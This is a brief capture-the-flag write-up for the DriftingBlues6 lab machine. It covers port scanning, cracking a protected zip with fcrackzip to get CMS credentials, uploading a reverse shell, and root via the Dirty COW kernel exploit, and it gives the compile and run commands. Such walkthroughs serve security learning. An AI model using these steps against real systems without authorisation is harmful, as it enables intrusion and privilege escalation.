Proving grounds Play - DriftingBlues6 CTF writeup.
Nmap
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-title: driftingblues
|_http-server-header: Apache/2.2.22 (Debian)
| http-robots.txt: 1 disallowed entry
|_/textpattern/textpattern
Web PORT: 80
Fuzzing for files
/robots.txt
Robots File
User-agent: *
Disallow: /textpattern/textpattern
dont forget to add .zip extension to your dir-brute
;)
Login
http://192.168.151.219/textpattern/textpattern/
Zip file found at http://192.168.151.219/spammer.zip
. File is password protected and which can be easliy cracked using fcrackzip
tool.
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt spammer.zip
Extracted password: myspace4
Extracted creds.txt
has login credentials for the CMS application.
mayer:lionheart
Login to the application and upload reverse shell.
Checked the document root configuration and triggered the reverse shell file.
Initial foothold obtained
Privilege Escalation
Check the kernel version to escalate privileges.
uname -a
Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
Linux kernel <3.2.0-4-amd64 is vulnerable to Linux Kernel 2.6.22 < 3.9 - ‘Dirty COW’ ‘PTRACE_POKEDATA’ Race Condition Privilege Escalation (/etc/passwd Method).
Download the exploit into the attacking machine and compile the code as mentioned in the exploit.
Run the exploit as follow:
gcc -pthread dirty.c -o dirty -lcrypt
./dirty password #password is the password for the user firefart created by the exploit
Switch user to firefart
and use the password password
.
Root shell obtained
Thanks for reading!
For more updates and insights, follow me on Twitter: @thevillagehacker.